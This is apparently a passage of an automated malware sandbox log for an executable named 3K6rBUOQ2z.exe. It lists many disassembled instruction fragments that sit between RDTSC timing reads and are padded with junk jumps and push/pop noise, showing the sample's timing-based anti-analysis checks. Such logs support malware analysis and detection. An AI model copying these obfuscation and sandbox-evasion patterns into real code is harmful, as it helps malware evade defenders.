Source: C:\Users\user\Desktop\3K6rBUOQ2z.exeRDTSC instruction interceptor: First address: 81CF24 second address: 81C786 instructions: 0x00000000 rdtsc 0x00000002 jns 00007F7F9153F88Eh 0x00000008 pop edx 0x00000009 pop eax 0x0000000a mov dword ptr [esp], eax 0x0000000d mov dword ptr [ebp+122D2005h], ebx 0x00000013 push dword ptr [ebp+122D1529h] 0x00000019 jmp 00007F7F9153F882h 0x0000001e stc 0x0000001f call dword ptr [ebp+122D1FDFh] 0x00000025 pushad 0x00000026 cld 0x00000027 xor eax, eax 0x00000029 or dword ptr [ebp+122D1BC9h], esi 0x0000002f mov edx, dword ptr [esp+28h] 0x00000033 cmc 0x00000034 clc 0x00000035 mov dword ptr [ebp+122D3560h], eax 0x0000003b mov dword ptr [ebp+122D1BC9h], ebx 0x00000041 mov esi, 0000003Ch 0x00000046 jmp 00007F7F9153F882h 0x0000004b xor dword ptr [ebp+122D22AFh], esi 0x00000051 add esi, dword ptr [esp+24h] 0x00000055 cmc 0x00000056 cmc 0x00000057 lodsw 0x00000059 jmp 00007F7F9153F882h 0x0000005e cld 0x0000005f add eax, dword ptr [esp+24h] 0x00000063 sub dword ptr [ebp+122D22E3h], eax 0x00000069 mov ebx, dword ptr [esp+24h] 0x0000006d sub dword ptr [ebp+122D26D5h], esi 0x00000073 nop 0x00000074 push esi 0x00000075 jmp 00007F7F9153F87Eh 0x0000007a pop esi 0x0000007b push eax 0x0000007c pushad 0x0000007d push eax 0x0000007e push edx 0x0000007f jng 00007F7F9153F876h 0x00000085 rdtsc
Source: C:\Users\user\Desktop\3K6rBUOQ2z.exeRDTSC instruction interceptor: First address: 81C786 second address: 81C794 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 js 00007F7F91348E26h 0x0000000e rdtsc
Source: C:\Users\user\Desktop\3K6rBUOQ2z.exeRDTSC instruction interceptor: First address: 990CEA second address: 990CEE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\3K6rBUOQ2z.exeRDTSC instruction interceptor: First address: 9902D7 second address: 9902DB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\3K6rBUOQ2z.exeRDTSC instruction interceptor: First address: 99058D second address: 9905A8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 jmp 00007F7F9153F886h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\3K6rBUOQ2z.exeRDTSC instruction interceptor: First address: 9905A8 second address: 9905B2 instructions: 0x00000000 rdtsc 0x00000002 jl 00007F7F91348E2Ch 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\3K6rBUOQ2z.exeRDTSC instruction interceptor: First address: 992C03 second address: 81C786 instructions: 0x00000000 rdtsc 0x00000002 jl 00007F7F9153F876h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a popad 0x0000000b add dword ptr [esp], 38D8A137h 0x00000012 cmc 0x00000013 push dword ptr [ebp+122D1529h] 0x00000019 mov ecx, 1C6C2C96h 0x0000001e call dword ptr [ebp+122D1FDFh] 0x00000024 pushad 0x00000025 cld 0x00000026 xor eax, eax 0x00000028 or dword ptr [ebp+122D1BC9h], esi 0x0000002e mov edx, dword ptr [esp+28h] 0x00000032 cmc 0x00000033 clc 0x00000034 mov dword ptr [ebp+122D3560h], eax 0x0000003a mov dword ptr [ebp+122D1BC9h], ebx 0x00000040 mov esi, 0000003Ch 0x00000045 jmp 00007F7F9153F882h 0x0000004a xor dword ptr [ebp+122D22AFh], esi 0x00000050 add esi, dword ptr [esp+24h] 0x00000054 cmc 0x00000055 cmc 0x00000056 lodsw 0x00000058 jmp 00007F7F9153F882h 0x0000005d cld 0x0000005e add eax, dword ptr [esp+24h] 0x00000062 sub dword ptr [ebp+122D22E3h], eax 0x00000068 mov ebx, dword ptr [esp+24h] 0x0000006c sub dword ptr [ebp+122D26D5h], esi 0x00000072 nop 0x00000073 push esi 0x00000074 jmp 00007F7F9153F87Eh 0x00000079 pop esi 0x0000007a push eax 0x0000007b pushad 0x0000007c push eax 0x0000007d push edx 0x0000007e jng 00007F7F9153F876h 0x00000084 rdtsc
Source: C:\Users\user\Desktop\3K6rBUOQ2z.exeRDTSC instruction interceptor: First address: 992C36 second address: 992C3A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\3K6rBUOQ2z.exeRDTSC instruction interceptor: First address: 992F66 second address: 992F76 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 pop edx 0x00000006 mov eax, dword ptr [eax] 0x00000008 push eax 0x00000009 push edx 0x0000000a pushad 0x0000000b pushad 0x0000000c popad 0x0000000d push ebx 0x0000000e pop ebx 0x0000000f popad 0x00000010 rdtsc
Source: C:\Users\user\Desktop\3K6rBUOQ2z.exeRDTSC instruction interceptor: First address: 992F76 second address: 992FAC instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F7F91348E31h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dword ptr [esp+04h], eax 0x0000000d push eax 0x0000000e push edx 0x0000000f je 00007F7F91348E3Bh 0x00000015 jmp 00007F7F91348E35h 0x0000001a rdtsc
Source: C:\Users\user\Desktop\3K6rBUOQ2z.exeRDTSC instruction interceptor: First address: 9B25BB second address: 9B25BF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\3K6rBUOQ2z.exeRDTSC instruction interceptor: First address: 9B272B second address: 9B2749 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 pop eax 0x00000006 jmp 00007F7F91348E38h 0x0000000b rdtsc
Source: C:\Users\user\Desktop\3K6rBUOQ2z.exeRDTSC instruction interceptor: First address: 9B2B9D second address: 9B2BA6 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\3K6rBUOQ2z.exeRDTSC instruction interceptor: First address: 9B2BA6 second address: 9B2BB9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 popad 0x00000007 popad 0x00000008 pushad 0x00000009 je 00007F7F91348E2Eh 0x0000000f pushad 0x00000010 popad 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
Source: C:\Users\user\Desktop\3K6rBUOQ2z.exeRDTSC instruction interceptor: First address: 9B2BB9 second address: 9B2BC0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\3K6rBUOQ2z.exeRDTSC instruction interceptor: First address: 9B2E7D second address: 9B2EEF instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 jmp 00007F7F91348E2Fh 0x00000008 jc 00007F7F91348E26h 0x0000000e pop esi 0x0000000f pop edx 0x00000010 pop eax 0x00000011 pushad 0x00000012 push ecx 0x00000013 push edx 0x00000014 pop edx 0x00000015 jmp 00007F7F91348E35h 0x0000001a pop ecx 0x0000001b jp 00007F7F91348E28h 0x00000021 pushad 0x00000022 popad 0x00000023 pushad 0x00000024 jmp 00007F7F91348E34h 0x00000029 jc 00007F7F91348E26h 0x0000002f jmp 00007F7F91348E36h 0x00000034 popad 0x00000035 push esi 0x00000036 push eax 0x00000037 push edx 0x00000038 rdtsc
Source: C:\Users\user\Desktop\3K6rBUOQ2z.exeRDTSC instruction interceptor: First address: 9B2EEF second address: 9B2EF5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\3K6rBUOQ2z.exeRDTSC instruction interceptor: First address: 9B3228 second address: 9B3238 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 popad 0x00000006 jbe 00007F7F91348E52h 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\3K6rBUOQ2z.exeRDTSC instruction interceptor: First address: 9B3238 second address: 9B323C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\3K6rBUOQ2z.exeRDTSC instruction interceptor: First address: 9B33AB second address: 9B33AF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\3K6rBUOQ2z.exeRDTSC instruction interceptor: First address: 9B33AF second address: 9B33D0 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F7F9153F882h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 jo 00007F7F9153F878h 0x0000000f push edi 0x00000010 pop edi 0x00000011 push edx 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
Source: C:\Users\user\Desktop\3K6rBUOQ2z.exeRDTSC instruction interceptor: First address: 9B33D0 second address: 9B33D9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 push eax 0x00000006 push edx 0x00000007 pushad 0x00000008 popad 0x00000009 rdtsc
Source: C:\Users\user\Desktop\3K6rBUOQ2z.exeRDTSC instruction interceptor: First address: 9B3680 second address: 9B36A1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jne 00007F7F9153F876h 0x0000000a popad 0x0000000b pop esi 0x0000000c push eax 0x0000000d push edx 0x0000000e jns 00007F7F9153F883h 0x00000014 rdtsc
Source: C:\Users\user\Desktop\3K6rBUOQ2z.exeRDTSC instruction interceptor: First address: 9B3E47 second address: 9B3E79 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F7F91348E2Bh 0x00000009 popad 0x0000000a pop esi 0x0000000b push eax 0x0000000c push edx 0x0000000d js 00007F7F91348E3Fh 0x00000013 jmp 00007F7F91348E39h 0x00000018 rdtsc
Source: C:\Users\user\Desktop\3K6rBUOQ2z.exeRDTSC instruction interceptor: First address: 9B3E79 second address: 9B3E92 instructions: 0x00000000 rdtsc 0x00000002 jc 00007F7F9153F88Bh 0x00000008 jmp 00007F7F9153F87Fh 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\3K6rBUOQ2z.exeRDTSC instruction interceptor: First address: 97E34D second address: 97E367 instructions: 0x00000000 rdtsc 0x00000002 jnl 00007F7F91348E26h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007F7F91348E2Ch 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
Source: C:\Users\user\Desktop\3K6rBUOQ2z.exeRDTSC instruction interceptor: First address: 97E367 second address: 97E36B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\3K6rBUOQ2z.exeRDTSC instruction interceptor: First address: 9BAF73 second address: 9BAF78 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\3K6rBUOQ2z.exeRDTSC instruction interceptor: First address: 9BB479 second address: 9BB480 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\3K6rBUOQ2z.exeRDTSC instruction interceptor: First address: 9BB480 second address: 9BB496 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 push eax 0x00000008 push eax 0x00000009 push edx 0x0000000a jnp 00007F7F91348E2Ch 0x00000010 rdtsc
Source: C:\Users\user\Desktop\3K6rBUOQ2z.exeRDTSC instruction interceptor: First address: 9BB496 second address: 9BB4A0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jng 00007F7F9153F876h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\3K6rBUOQ2z.exeRDTSC instruction interceptor: First address: 9BB4A0 second address: 9BB4A4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\3K6rBUOQ2z.exeRDTSC instruction interceptor: First address: 9BB4A4 second address: 9BB4B4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov eax, dword ptr [esp+04h] 0x0000000c push esi 0x0000000d pushad 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\3K6rBUOQ2z.exeRDTSC instruction interceptor: First address: 9BB4B4 second address: 9BB4CA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 popad 0x00000007 pop esi 0x00000008 mov eax, dword ptr [eax] 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d pushad 0x0000000e popad 0x0000000f jns 00007F7F91348E26h 0x00000015 popad 0x00000016 rdtsc
Source: C:\Users\user\Desktop\3K6rBUOQ2z.exeRDTSC instruction interceptor: First address: 9BB4CA second address: 9BB4CF instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\3K6rBUOQ2z.exeRDTSC instruction interceptor: First address: 9B9D37 second address: 9B9D41 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jne 00007F7F91348E26h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\3K6rBUOQ2z.exeRDTSC instruction interceptor: First address: 9B9D41 second address: 9B9D54 instructions: 0x00000000 rdtsc 0x00000002 jl 00007F7F9153F876h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push eax 0x0000000e push edx 0x0000000f push eax 0x00000010 push edx 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
Source: C:\Users\user\Desktop\3K6rBUOQ2z.exeRDTSC instruction interceptor: First address: 9B9D54 second address: 9B9D58 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\3K6rBUOQ2z.exeRDTSC instruction interceptor: First address: 9B9D58 second address: 9B9D5E instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\3K6rBUOQ2z.exeRDTSC instruction interceptor: First address: 9B9D5E second address: 9B9D65 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 pop eax 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\3K6rBUOQ2z.exeRDTSC instruction interceptor: First address: 9BB5F2 second address: 9BB646 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F7F9153F881h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov eax, dword ptr [esp+04h] 0x0000000d jnp 00007F7F9153F884h 0x00000013 mov eax, dword ptr [eax] 0x00000015 push eax 0x00000016 jns 00007F7F9153F87Ch 0x0000001c jnl 00007F7F9153F876h 0x00000022 pop eax 0x00000023 mov dword ptr [esp+04h], eax 0x00000027 pushad 0x00000028 pushad 0x00000029 jnp 00007F7F9153F876h 0x0000002f push edi 0x00000030 pop edi 0x00000031 popad 0x00000032 push eax 0x00000033 push edx 0x00000034 jo 00007F7F9153F876h 0x0000003a rdtsc
Source: C:\Users\user\Desktop\3K6rBUOQ2z.exeRDTSC instruction interceptor: First address: 9BB79B second address: 9BB7A5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jl 00007F7F91348E26h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\3K6rBUOQ2z.exeRDTSC instruction interceptor: First address: 9BE99C second address: 9BE9A6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jc 00007F7F9153F876h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\3K6rBUOQ2z.exeRDTSC instruction interceptor: First address: 9BDF3A second address: 9BDF3E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\3K6rBUOQ2z.exeRDTSC instruction interceptor: First address: 9BE094 second address: 9BE0C3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F7F9153F888h 0x00000009 pop edx 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007F7F9153F87Eh 0x00000011 push ecx 0x00000012 pop ecx 0x00000013 rdtsc
Source: C:\Users\user\Desktop\3K6rBUOQ2z.exeRDTSC instruction interceptor: First address: 9BE231 second address: 9BE235 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\3K6rBUOQ2z.exeRDTSC instruction interceptor: First address: 9BE235 second address: 9BE239 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\3K6rBUOQ2z.exeRDTSC instruction interceptor: First address: 9BE239 second address: 9BE249 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 js 00007F7F91348E26h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push edi 0x0000000d push ebx 0x0000000e pop ebx 0x0000000f pop edi 0x00000010 rdtsc
Source: C:\Users\user\Desktop\3K6rBUOQ2z.exeRDTSC instruction interceptor: First address: 9BE249 second address: 9BE24F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\3K6rBUOQ2z.exeRDTSC instruction interceptor: First address: 9BE24F second address: 9BE25F instructions: 0x00000000 rdtsc 0x00000002 jns 00007F7F91348E26h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop edx 0x0000000b pop eax 0x0000000c pushad 0x0000000d pushad 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\3K6rBUOQ2z.exeRDTSC instruction interceptor: First address: 9BE25F second address: 9BE276 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 push eax 0x00000007 pop eax 0x00000008 jmp 00007F7F9153F87Ah 0x0000000d popad 0x0000000e push eax 0x0000000f push edx 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\3K6rBUOQ2z.exeRDTSC instruction interceptor: First address: 9BE276 second address: 9BE27A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\3K6rBUOQ2z.exeRDTSC instruction interceptor: First address: 9BE27A second address: 9BE294 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F7F9153F87Dh 0x00000007 jp 00007F7F9153F876h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f push edi 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\3K6rBUOQ2z.exeRDTSC instruction interceptor: First address: 9BE83E second address: 9BE842 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\3K6rBUOQ2z.exeRDTSC instruction interceptor: First address: 9BE842 second address: 9BE856 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jmp 00007F7F9153F87Ah 0x0000000d pushad 0x0000000e popad 0x0000000f rdtsc
Source: C:\Users\user\Desktop\3K6rBUOQ2z.exeRDTSC instruction interceptor: First address: 9C05DB second address: 9C063B instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F7F91348E31h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop eax 0x0000000a mov esi, dword ptr [ebp+122D22BCh] 0x00000010 call 00007F7F91348E29h 0x00000015 jl 00007F7F91348E43h 0x0000001b pushad 0x0000001c push edi 0x0000001d pop edi 0x0000001e jmp 00007F7F91348E39h 0x00000023 popad 0x00000024 push eax 0x00000025 push eax 0x00000026 push edx 0x00000027 jmp 00007F7F91348E35h 0x0000002c rdtsc
Source: C:\Users\user\Desktop\3K6rBUOQ2z.exeRDTSC instruction interceptor: First address: 9C063B second address: 9C066F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F7F9153F884h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov eax, dword ptr [esp+04h] 0x0000000d push eax 0x0000000e push edx 0x0000000f jmp 00007F7F9153F886h 0x00000014 rdtsc
Source: C:\Users\user\Desktop\3K6rBUOQ2z.exeRDTSC instruction interceptor: First address: 9C066F second address: 9C0696 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 jmp 00007F7F91348E35h 0x00000008 pop ebx 0x00000009 pop edx 0x0000000a pop eax 0x0000000b mov eax, dword ptr [eax] 0x0000000d push eax 0x0000000e push edx 0x0000000f push eax 0x00000010 push edx 0x00000011 jo 00007F7F91348E26h 0x00000017 rdtsc
Source: C:\Users\user\Desktop\3K6rBUOQ2z.exeRDTSC instruction interceptor: First address: 9C0696 second address: 9C069A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\3K6rBUOQ2z.exeRDTSC instruction interceptor: First address: 9C069A second address: 9C06A0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\3K6rBUOQ2z.exeRDTSC instruction interceptor: First address: 9C06A0 second address: 9C06B0 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 push eax 0x00000004 pop eax 0x00000005 pop edx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov dword ptr [esp+04h], eax 0x0000000c push eax 0x0000000d push esi 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\3K6rBUOQ2z.exeRDTSC instruction interceptor: First address: 9C0A87 second address: 9C0A8D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\3K6rBUOQ2z.exeRDTSC instruction interceptor: First address: 9C0A8D second address: 9C0A99 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edi 0x00000006 push eax 0x00000007 push ecx 0x00000008 push eax 0x00000009 push edx 0x0000000a push ebx 0x0000000b pop ebx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\3K6rBUOQ2z.exeRDTSC instruction interceptor: First address: 9C0A99 second address: 9C0A9D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\3K6rBUOQ2z.exeRDTSC instruction interceptor: First address: 9C16FE second address: 9C1708 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 pushad 0x00000009 popad 0x0000000a rdtsc
Source: C:\Users\user\Desktop\3K6rBUOQ2z.exeRDTSC instruction interceptor: First address: 9C1708 second address: 9C170C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\3K6rBUOQ2z.exeRDTSC instruction interceptor: First address: 9C17CA second address: 9C17E5 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F7F9153F883h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b push ecx 0x0000000c pop ecx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\3K6rBUOQ2z.exeRDTSC instruction interceptor: First address: 9C17E5 second address: 9C17E9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\3K6rBUOQ2z.exeRDTSC instruction interceptor: First address: 9C1851 second address: 9C185B instructions: 0x00000000 rdtsc 0x00000002 jns 00007F7F9153F876h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\Desktop\3K6rBUOQ2z.exeRDTSC instruction interceptor: First address: 9C1904 second address: 9C191A instructions: 0x00000000 rdtsc 0x00000002 jns 00007F7F91348E28h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b pushad 0x0000000c push esi 0x0000000d push edi 0x0000000e pop edi 0x0000000f pop esi 0x00000010 push eax 0x00000011 push edx 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
Source: C:\Users\user\Desktop\3K6rBUOQ2z.exeRDTSC instruction interceptor: First address: 9C191A second address: 9C191E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\3K6rBUOQ2z.exeRDTSC instruction interceptor: First address: 9C191E second address: 9C1956 instructions: 0x00000000 rdtsc 0x00000002 jl 00007F7F91348E26h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a popad 0x0000000b nop 0x0000000c push 00000000h 0x0000000e push ecx 0x0000000f call 00007F7F91348E28h 0x00000014 pop ecx 0x00000015 mov dword ptr [esp+04h], ecx 0x00000019 add dword ptr [esp+04h], 00000019h 0x00000021 inc ecx 0x00000022 push ecx 0x00000023 ret 0x00000024 pop ecx 0x00000025 ret 0x00000026 xchg eax, ebx 0x00000027 push eax 0x00000028 push edx 0x00000029 push eax 0x0000002a push edx 0x0000002b jbe 00007F7F91348E26h 0x00000031 rdtsc
Source: C:\Users\user\Desktop\3K6rBUOQ2z.exeRDTSC instruction interceptor: First address: 9C1956 second address: 9C1960 instructions: 0x00000000 rdtsc 0x00000002 jc 00007F7F9153F876h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\Desktop\3K6rBUOQ2z.exeRDTSC instruction interceptor: First address: 9C1E57 second address: 9C1E5C instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\3K6rBUOQ2z.exeRDTSC instruction interceptor: First address: 9C27CF second address: 9C27D4 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\3K6rBUOQ2z.exeRDTSC instruction interceptor: First address: 9C27D4 second address: 9C2812 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop edx 0x00000006 pop eax 0x00000007 mov dword ptr [esp], eax 0x0000000a mov si, BAE6h 0x0000000e push 00000000h 0x00000010 push 00000000h 0x00000012 push 00000000h 0x00000014 push eax 0x00000015 call 00007F7F91348E28h 0x0000001a pop eax 0x0000001b mov dword ptr [esp+04h], eax 0x0000001f add dword ptr [esp+04h], 0000001Ah 0x00000027 inc eax 0x00000028 push eax 0x00000029 ret 0x0000002a pop eax 0x0000002b ret 0x0000002c push eax 0x0000002d pushad 0x0000002e push eax 0x0000002f push edx 0x00000030 jc 00007F7F91348E26h 0x00000036 rdtsc
Source: C:\Users\user\Desktop\3K6rBUOQ2z.exeRDTSC instruction interceptor: First address: 9C2812 second address: 9C2827 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F7F9153F87Dh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\3K6rBUOQ2z.exeRDTSC instruction interceptor: First address: 9C2827 second address: 9C282B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\3K6rBUOQ2z.exeRDTSC instruction interceptor: First address: 9C282B second address: 9C282F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\3K6rBUOQ2z.exeRDTSC instruction interceptor: First address: 9C385D second address: 9C3867 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jnc 00007F7F91348E26h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\3K6rBUOQ2z.exeRDTSC instruction interceptor: First address: 9C3066 second address: 9C306B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
